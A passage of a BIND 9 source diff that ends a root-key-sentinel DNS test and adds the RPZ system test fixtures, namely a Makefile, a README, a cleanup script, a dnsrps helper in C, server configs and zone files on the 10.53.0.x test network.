dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-not-ta with old ta and" " 'root-key-sentinel no;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.4 old-not-ta.example A > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "old-not-ta.*CNAME.root-key-sentinel-not-ta-${oldid}.example." dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-is-ta with new ta and" " 'root-key-sentinel no;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.4 new-is-ta.example A > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "new-is-ta.*CNAME.root-key-sentinel-is-ta-${newid}.example." dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-not-ta with new ta and" " 'root-key-sentinel no;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.4 new-not-ta.example A > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "new-not-ta.*CNAME.root-key-sentinel-not-ta-${newid}.example." dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-is-ta with bad ta and" " 'root-key-sentinel no;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.4 bad-is-ta.example A > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "bad-is-ta.*CNAME.root-key-sentinel-is-ta-${badid}.example" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-not-ta with bad ta and" " 'root-key-sentinel no;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.4 bad-not-ta.example A > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "bad-not-ta.*CNAME.root-key-sentinel-not-ta-${badid}.example." dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/rpz/Makefile.in b/bin/tests/system/rpz/Makefile.in new file mode 100644 index 0000000..bc73907 --- /dev/null +++ b/bin/tests/system/rpz/Makefile.in @@ -0,0 +1,48 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +srcdir = @srcdir@ +VPATH = @srcdir@ +top_srcdir = @top_srcdir@ + +VERSION=@BIND9_VERSION@ + +@BIND9_MAKE_INCLUDES@ + +CINCLUDES = ${ISC_INCLUDES} ${DNS_INCLUDES} + +CDEFINES = +CWARNINGS = + +ISCLIBS = ../../../../lib/isc/libisc.@A@ @NO_LIBTOOL_ISCLIBS@ + +ISCDEPLIBS = ../../../../lib/isc/libisc.@A@ + +DEPLIBS = ${ISCDEPLIBS} + +LIBS = ${ISCLIBS} @LIBS@ + +TARGETS = dnsrps@EXEEXT@ + +DNSRPSOBJS = dnsrps.@O@ + +SRCS = dnsrps.c + +@BIND9_MAKE_RULES@ + +all: dnsrps@EXEEXT@ + +dnsrps@EXEEXT@: ${DNSRPSOBJS} ${DEPLIBS} + ${LIBTOOL_MODE_LINK} ${PURIFY} ${CC} ${CFLAGS} ${LDFLAGS} -o $@ ${DNSRPSOBJS} ${LIBS} + +clean distclean:: + rm -f ${TARGETS} + diff --git a/bin/tests/system/rpz/README b/bin/tests/system/rpz/README new file mode 100644 index 0000000..238e360 --- /dev/null +++ b/bin/tests/system/rpz/README @@ -0,0 +1,36 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +The test setup for the RPZ tests prepares a query perf tool and sets up +policy zones. + +Name servers +------------ + +ns1 is the root server. + +ns2 and ns4 are authoritative servers for the various test domains. + +ns3 is the main rewriting resolver. + +ns5 and ns7 are additional rewriting resolvers. + +ns6 is a forwarding server. + + +Updating the response policy zones +---------------------------------- + +test1, test2, test3, test4, test5, and test6 are dynamic update files. These +updates are made against ns3. The script function "start_group" is called to +start an new batch of tests that may depend on certain server updates. The +function takes an optional file name and if provided the server updates are +performed before executing the test batch. diff --git a/bin/tests/system/rpz/clean.sh b/bin/tests/system/rpz/clean.sh new file mode 100644 index 0000000..1a3127c --- /dev/null +++ b/bin/tests/system/rpz/clean.sh @@ -0,0 +1,57 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# Clean up after rpz tests. + +USAGE="$0: [-Px]" +DEBUG= +while getopts "Px" c; do + case $c in + x) set -x ;; + P) PARTIAL=set ;; + *) echo "$USAGE" 1>&2; exit 1;; + esac +done +shift `expr $OPTIND - 1 || true` +if test "$#" -ne 0; then + echo "$USAGE" 1>&2 + exit 1 +fi + +# this might be called from setup.sh to partially clean up the files +# from the first test pass so the second pass can be set up correctly. +# remove those files first, then decide whether to remove the others. +rm -f ns*/*.key ns*/*.private +rm -f ns2/tld2s.db */bl.tld2.db */bl.tld2s.db +rm -f ns3/bl*.db ns3/fast-expire.db ns*/empty.db +rm -f ns3/manual-update-rpz.db +rm -f ns3/mixed-case-rpz.db +rm -f ns5/example.db ns5/bl.db ns5/fast-expire.db ns5/expire.conf +rm -f ns8/manual-update-rpz.db +rm -f */policy2.db +rm -f */*.jnl + +if [ ${PARTIAL:-unset} = unset ]; then + rm -f proto.* dsset-* trusted.conf dig.out* nsupdate.tmp ns*/*tmp + rm -f ns5/requests ns5/*.perf + rm -f */named.memstats */*.run */*.run.prev */named.stats */session.key + rm -f */*.log */*core */*.pid + rm -f ns*/named.lock + rm -f ns*/named.conf + rm -f ns*/*switch + rm -f dnsrps*.conf + rm -f dnsrpzd.conf + rm -f dnsrpzd-license-cur.conf dnsrpzd.rpzf dnsrpzd.sock dnsrpzd.pid + rm -f ns*/managed-keys.bind* + rm -f tmp +fi diff --git a/bin/tests/system/rpz/dnsrps.c b/bin/tests/system/rpz/dnsrps.c new file mode 100644 index 0000000..82ee05f --- /dev/null +++ b/bin/tests/system/rpz/dnsrps.c @@ -0,0 +1,172 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * -a exit(0) if dnsrps is available or dlopen() msg if not + * -p print the path to dnsrpzd configured in dnsrps so that + * dnsrpzd can be run by a setup.sh script. + * Exit(1) if dnsrps is not available + * -n domain print the serial number of a domain to check if a new + * version of a policy zone has been transferred to dnsrpzd. + * Exit(1) if dnsrps is not available + * -w sec.ond wait for seconds, because `sleep 0.1` is not portable + */ + +#include <errno.h> +#include <inttypes.h> +#include <stdbool.h> +#include <stdint.h> +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <sys/stat.h> +#include <sys/types.h> +#include <unistd.h> + +#include <isc/print.h> +#include <isc/util.h> + +#ifdef USE_DNSRPS +#define LIBRPZ_LIB_OPEN DNSRPS_LIB_OPEN +#include <dns/librpz.h> + +librpz_t *librpz; +#else /* ifdef USE_DNSRPS */ +typedef struct { + char c[120]; +} librpz_emsg_t; +#endif /* ifdef USE_DNSRPS */ + +static bool +link_dnsrps(librpz_emsg_t *emsg); + +#define USAGE "usage: [-ap] [-n domain] [-w sec.onds]\n" + +int +main(int argc, char **argv) { +#ifdef USE_DNSRPS + char cstr[sizeof("zone ") + 1024 + 10]; + librpz_clist_t *clist; + librpz_client_t *client; + librpz_rsp_t *rsp; + uint32_t serial; +#endif /* ifdef USE_DNSRPS */ + double seconds; + librpz_emsg_t emsg; + char *p; + int i; + + while ((i = getopt(argc, argv, "apn:w:")) != -1) { + switch (i) { + case 'a': + if (!link_dnsrps(&emsg)) { + printf("I:%s\n", emsg.c); + return (1); + } + return (0); + + case 'p': + if (!link_dnsrps(&emsg)) { + fprintf(stderr, "## %s\n", emsg.c); + return (1); + } +#ifdef USE_DNSRPS + printf("%s\n", librpz->dnsrpzd_path); +#else /* ifdef USE_DNSRPS */ + UNREACHABLE(); +#endif /* ifdef USE_DNSRPS */ + return (0); + + case 'n': + if (!link_dnsrps(&emsg)) { + fprintf(stderr, "## %s\n", emsg.c); + return (1); + } +#ifdef USE_DNSRPS + /* + * Get the serial number of a policy zone from + * a running dnsrpzd daemon. + */ + clist = librpz->clist_create(&emsg, NULL, NULL, NULL, + NULL, NULL); + if (clist == NULL) { + fprintf(stderr, "## %s: %s\n", optarg, emsg.c); + return (1); + } + snprintf(cstr, sizeof(cstr), + "zone %s; dnsrpzd \"\";" + " dnsrpzd-sock dnsrpzd.sock;" + " dnsrpzd-rpzf dnsrpzd.rpzf", + optarg); + client = librpz->client_create(&emsg, clist, cstr, + true); + if (client == NULL) { + fprintf(stderr, "## %s\n", emsg.c); + return (1); + } + + rsp = NULL; + if (!librpz->rsp_create(&emsg, &rsp, NULL, client, true, + false) || + rsp == NULL) + { + fprintf(stderr, "## %s\n", emsg.c); + librpz->client_detach(&client); + return (1); + } + + if (!librpz->soa_serial(&emsg, &serial, optarg, rsp)) { + fprintf(stderr, "## %s\n", emsg.c); + librpz->client_detach(&client); + return (1); + } + librpz->rsp_detach(&rsp); + librpz->client_detach(&client); + printf("%u\n", serial); +#else /* ifdef USE_DNSRPS */ + UNREACHABLE(); +#endif /* ifdef USE_DNSRPS */ + return (0); + + case 'w': + seconds = strtod(optarg, &p); + if (seconds <= 0 || *p != '\0') { + fputs(USAGE, stderr); + return (1); + } + usleep((int)(seconds * 1000.0 * 1000.0)); + return (0); + + default: + fputs(USAGE, stderr); + return (1); + } + } + fputs(USAGE, stderr); + return (1); +} + +static bool +link_dnsrps(librpz_emsg_t *emsg) { +#ifdef USE_DNSRPS + librpz = librpz_lib_open(emsg, NULL, DNSRPS_LIBRPZ_PATH); + if (librpz == NULL) { + return (false); + } + + return (true); +#else /* ifdef USE_DNSRPS */ + snprintf(emsg->c, sizeof(emsg->c), "DNSRPS not configured"); + return (false); +#endif /* ifdef USE_DNSRPS */ +} diff --git a/bin/tests/system/rpz/dnsrpzd-license.conf b/bin/tests/system/rpz/dnsrpzd-license.conf new file mode 100644 index 0000000..d9cf2b5 --- /dev/null +++ b/bin/tests/system/rpz/dnsrpzd-license.conf @@ -0,0 +1,23 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone isc.license.fastrpz.com { + masters port 53 { + KEY farsight_fastrpz_license 104.244.14.176; + KEY farsight_fastrpz_license 2620:11c:f008::176; + }; +}; + +key farsight_fastrpz_license { + algorithm hmac-sha256; secret "f405d02b4c8af54855fcebc1"; +}; diff --git a/bin/tests/system/rpz/dnsrpzd.conf.in b/bin/tests/system/rpz/dnsrpzd.conf.in new file mode 100644 index 0000000..ce2442c --- /dev/null +++ b/bin/tests/system/rpz/dnsrpzd.conf.in @@ -0,0 +1,62 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# dnsrpzd configuration. + +pid-file ../dnsrpzd.pid + +include ../dnsrpzd-license-cur.conf + +# configure NOTIFY and zone transfers +port @EXTRAPORT1@; +listen-on port @EXTRAPORT1@ { 10.53.0.3; }; +allow-notify { 10.53.0.0/24; }; + +zone "bl0" {type primary; file "../ns5/bl.db"; }; +zone "bl1" {type primary; file "../ns5/bl.db"; }; +zone "bl2" {type primary; file "../ns5/bl.db"; }; +zone "bl3" {type primary; file "../ns5/bl.db"; }; +zone "bl4" {type primary; file "../ns5/bl.db"; }; +zone "bl5" {type primary; file "../ns5/bl.db"; }; +zone "bl6" {type primary; file "../ns5/bl.db"; }; +zone "bl7" {type primary; file "../ns5/bl.db"; }; +zone "bl8" {type primary; file "../ns5/bl.db"; }; +zone "bl9" {type primary; file "../ns5/bl.db"; }; +zone "bl10" {type primary; file "../ns5/bl.db"; }; +zone "bl11" {type primary; file "../ns5/bl.db"; }; +zone "bl12" {type primary; file "../ns5/bl.db"; }; +zone "bl13" {type primary; file "../ns5/bl.db"; }; +zone "bl14" {type primary; file "../ns5/bl.db"; }; +zone "bl15" {type primary; file "../ns5/bl.db"; }; +zone "bl16" {type primary; file "../ns5/bl.db"; }; +zone "bl17" {type primary; file "../ns5/bl.db"; }; +zone "bl18" {type primary; file "../ns5/bl.db"; }; +zone "bl19" {type primary; file "../ns5/bl.db"; }; + +zone "bl" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-2" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-given" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-passthru" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-no-op" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-disabled" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-nodata" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-nxdomain" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-cname" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-wildcname" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-garden" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-drop" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl-tcp-only" {type slave; masters port @PORT@ { 10.53.0.3; }; }; +zone "bl.tld2" {type slave; masters port @PORT@ { 10.53.0.3; }; }; + +zone "policy1" {type slave; masters port @PORT@ { 10.53.0.6; }; }; +zone "policy2" {type slave; masters port @PORT@ { 10.53.0.7; }; }; diff --git a/bin/tests/system/rpz/ns1/named.conf.in b/bin/tests/system/rpz/ns1/named.conf.in new file mode 100644 index 0000000..439ecff --- /dev/null +++ b/bin/tests/system/rpz/ns1/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + session-keyfile "session.key"; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + notify no; + minimal-responses no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." {type primary; file "root.db";}; diff --git a/bin/tests/system/rpz/ns1/root.db b/bin/tests/system/rpz/ns1/root.db new file mode 100644 index 0000000..6bf3d5a --- /dev/null +++ b/bin/tests/system/rpz/ns1/root.db @@ -0,0 +1,42 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +. SOA ns. hostmaster.ns. ( 1 3600 1200 604800 60 ) + NS ns. +ns. A 10.53.0.1 + +; rewrite responses from this zone +tld2. NS ns.tld2. +ns.tld2. A 10.53.0.2 + +; rewrite responses from this secure zone unless dnssec requested (DO=1) +tld2s. NS ns.tld2. + +; requests come from here +tld3. NS ns.tld3. +ns.tld3. A 10.53.0.3 + +; rewrite responses from this zone +tld4. NS ns.tld4. +ns.tld4. A 10.53.0.4 + +; performance test +tld5. NS ns.tld5. +ns.tld5. A 10.53.0.5 + +; generate SERVFAIL +servfail NS ns.tld2. + +a-only.example A 1.2.3.4 +no-a-no-aaaa.example TXT placeholder +a-plus-aaaa.example A 1.2.3.4 +a-plus-aaaa.example AAAA ::1 diff --git a/bin/tests/system/rpz/ns10/hints b/bin/tests/system/rpz/ns10/hints new file mode 100644 index 0000000..b657c39 --- /dev/null +++ b/bin/tests/system/rpz/ns10/hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 120 NS ns. +ns. 120 A 10.53.0.1 diff --git a/bin/tests/system/rpz/ns10/named.conf.in b/bin/tests/system/rpz/ns10/named.conf.in new file mode 100644 index 0000000..b34ce79 --- /dev/null +++ b/bin/tests/system/rpz/ns10/named.conf.in @@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.10; + notify-source 10.53.0.10; + transfer-source 10.53.0.10; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.10; }; + listen-on-v6 { none; }; + notify no; + minimal-responses no; + recursion yes; + dnssec-validation yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; +controls { + inet 10.53.0.10 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +include "../trusted.conf"; +zone "." { type hint; file "hints"; }; + +# grafted on zones using stub and static-stub +zone "stub-nomatch." {type primary; file "stub.db"; }; +zone "static-stub-nomatch." {type primary; file "stub.db"; }; diff --git a/bin/tests/system/rpz/ns10/stub.db b/bin/tests/system/rpz/ns10/stub.db new file mode 100644 index 0000000..8ecac8c --- /dev/null +++ b/bin/tests/system/rpz/ns10/stub.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; RPZ rewrite responses from this zone + +$TTL 120 +@ SOA ns hostmaster.ns ( 1 3600 1200 604800 60 ) + NS ns +ns A 10.53.0.10 + +a3-1 A 10.53.99.99 + +a4-1 A 10.53.99.99 diff --git a/bin/tests/system/rpz/ns2/base-tld2s.db b/bin/tests/system/rpz/ns2/base-tld2s.db new file mode 100644 index 0000000..77114ec --- /dev/null +++ b/bin/tests/system/rpz/ns2/base-tld2s.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; RPZ rewrite responses from this signed zone + +$TTL 120 +@ SOA tld2s. hostmaster.ns.tld2. ( 1 3600 1200 604800 60 ) + NS ns + NS . ; check for RT 24985 +ns A 10.53.0.2 + + +a0-1 A 192.168.0.1 +a0-1-scname CNAME a0-1.tld2. + +a3-5 A 192.168.3.5 + +a7-2 A 192.168.7.2 diff --git a/bin/tests/system/rpz/ns2/bl.tld2.db.in b/bin/tests/system/rpz/ns2/bl.tld2.db.in new file mode 100644 index 0000000..25780b7 --- /dev/null +++ b/bin/tests/system/rpz/ns2/bl.tld2.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; primary for secondary RPZ zone + +$TTL 3600 +@ SOA rpz.tld2. hostmaster.ns.tld2. ( 1 3600 1200 604800 60 ) + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +32.1.7.168.192.rpz-ip CNAME . diff --git a/bin/tests/system/rpz/ns2/blv2.tld2.db.in b/bin/tests/system/rpz/ns2/blv2.tld2.db.in new file mode 100644 index 0000000..123e1b4 --- /dev/null +++ b/bin/tests/system/rpz/ns2/blv2.tld2.db.in @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; primary for secondary RPZ zone + +$TTL 3600 +@ SOA rpz.tld2. hostmaster.ns.tld2. ( 2 3600 1200 604800 60 ) + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 diff --git a/bin/tests/system/rpz/ns2/blv3.tld2.db.in b/bin/tests/system/rpz/ns2/blv3.tld2.db.in new file mode 100644 index 0000000..b8ba587 --- /dev/null +++ b/bin/tests/system/rpz/ns2/blv3.tld2.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; primary for secondary RPZ zone + +$TTL 3600 +@ SOA rpz.tld2. hostmaster.ns.tld2. ( 3 3600 1200 604800 60 ) + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +32.1.7.168.192.rpz-ip CNAME . diff --git a/bin/tests/system/rpz/ns2/hints b/bin/tests/system/rpz/ns2/hints new file mode 100644 index 0000000..b657c39 --- /dev/null +++ b/bin/tests/system/rpz/ns2/hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 120 NS ns. +ns. 120 A 10.53.0.1 diff --git a/bin/tests/system/rpz/ns2/named.conf.in b/bin/tests/system/rpz/ns2/named.conf.in new file mode 100644 index 0000000..1dde354 --- /dev/null +++ b/bin/tests/system/rpz/ns2/named.conf.in @@ -0,0 +1,55 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + notify no; + minimal-responses no; + recursion yes; + dnssec-validation yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +include "../trusted.conf"; +zone "." { type hint; file "hints"; }; + +zone "tld2." {type primary; file "tld2.db";}; +zone "sub1.tld2." {type primary; file "tld2.db";}; +zone "subsub.sub1.tld2." {type primary; file "tld2.db";}; +zone "sub2.tld2." {type primary; file "tld2.db";}; +zone "subsub.sub2.tld2." {type primary; file "tld2.db";}; +zone "sub3.tld2." {type primary; file "tld2.db";}; +zone "subsub.sub3.tld2." {type primary; file "tld2.db";}; + +zone "tld2s." {type primary; file "tld2s.db";}; + +zone "bl.tld2." {type primary; file "bl.tld2.db"; + notify yes; notify-delay 0;}; + +# grafted on zones using stub and static-stub +zone "stub." {type primary; file "stub.db"; }; +zone "static-stub." {type primary; file "stub.db"; }; diff --git a/bin/tests/system/rpz/ns2/stub.db b/bin/tests/system/rpz/ns2/stub.db new file mode 100644 index 0000000..e4b8781 --- /dev/null +++ b/bin/tests/system/rpz/ns2/stub.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; RPZ rewrite responses from this zone + +$TTL 120 +@ SOA tld2. hostmaster.ns.tld2. ( 1 3600 1200 604800 60 ) + NS ns.sub1.tld2. + +a3-1 A 10.53.99.99 + +a4-1 A 10.53.99.99 diff --git a/bin/tests/system/rpz/ns2/tld2.db b/bin/tests/system/rpz/ns2/tld2.db new file mode 100644 index 0000000..c6f2556 --- /dev/null +++ b/bin/tests/system/rpz/ns2/tld2.db @@ -0,0 +1,125 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; RPZ rewrite responses from this zone + +$TTL 120 +@ SOA tld2. hostmaster.ns.tld2. ( 1 3600 1200 604800 60 ) + NS ns + NS . ; check for RT 24985 +ns A 10.53.0.2 + + +txt-only TXT "txt-only-tld2" + +a12 A 12.12.12.12 + AAAA 2001::12 + TXT "a12 tld2 text" +a12-cname CNAME a12 + +a0-1 A 192.168.0.1 + AAAA 2001:2::1 + TXT "a0-1 tld2 text" +a0-1-scname CNAME a0-1.tld2s. + + +a3-1 A 192.168.3.1 + AAAA 2001:2:3::1 + TXT "a3-1 tld2 text" + +a3-2 A 192.168.3.2 + AAAA 2001:2:3::2 + TXT "a3-2 tld2 text" + +a3-3 A 192.168.3.3 + AAAA 2001:2:3::3 + TXT "a3-3 tld2 text" + +a3-4 A 192.168.3.4 + AAAA 2001:2:3::4 + TXT "a3-4 tld2 text" + +a3-5 A 192.168.3.5 + AAAA 2001:2:3::5 + TXT "a3-5 tld2 text" + +a3-6 A 192.168.3.6 + AAAA 2001:2:3::6 + TXT "a3-6 tld2 text" + +a3-7 A 192.168.3.7 + AAAA 2001:2:3::7 + TXT "a3-7 tld2 text" + +a3-8 A 192.168.3.8 + AAAA 2001:2:3::8 + TXT "a3-8 tld2 text" + +a3-9 A 192.168.3.9 + AAAA 2001:2:3::9 + TXT "a3-9 tld2 text" + +a4-1 A 192.168.4.1 + AAAA 2001:2:4::1 + TXT "a4-1 tld2 text" +a4-1-aaaa AAAA 2001:2:4::1 + +a4-2 A 192.168.4.2 + AAAA 2001:2:4::2 + TXT "a4-2 tld2 text" +a4-2-cname CNAME a4-2 + +a4-3 A 192.168.4.3 + AAAA 2001:2:4::3 + TXT "a4-3 tld2 text" +a4-3-cname CNAME a4-3 + +a4-4 A 192.168.4.4 + 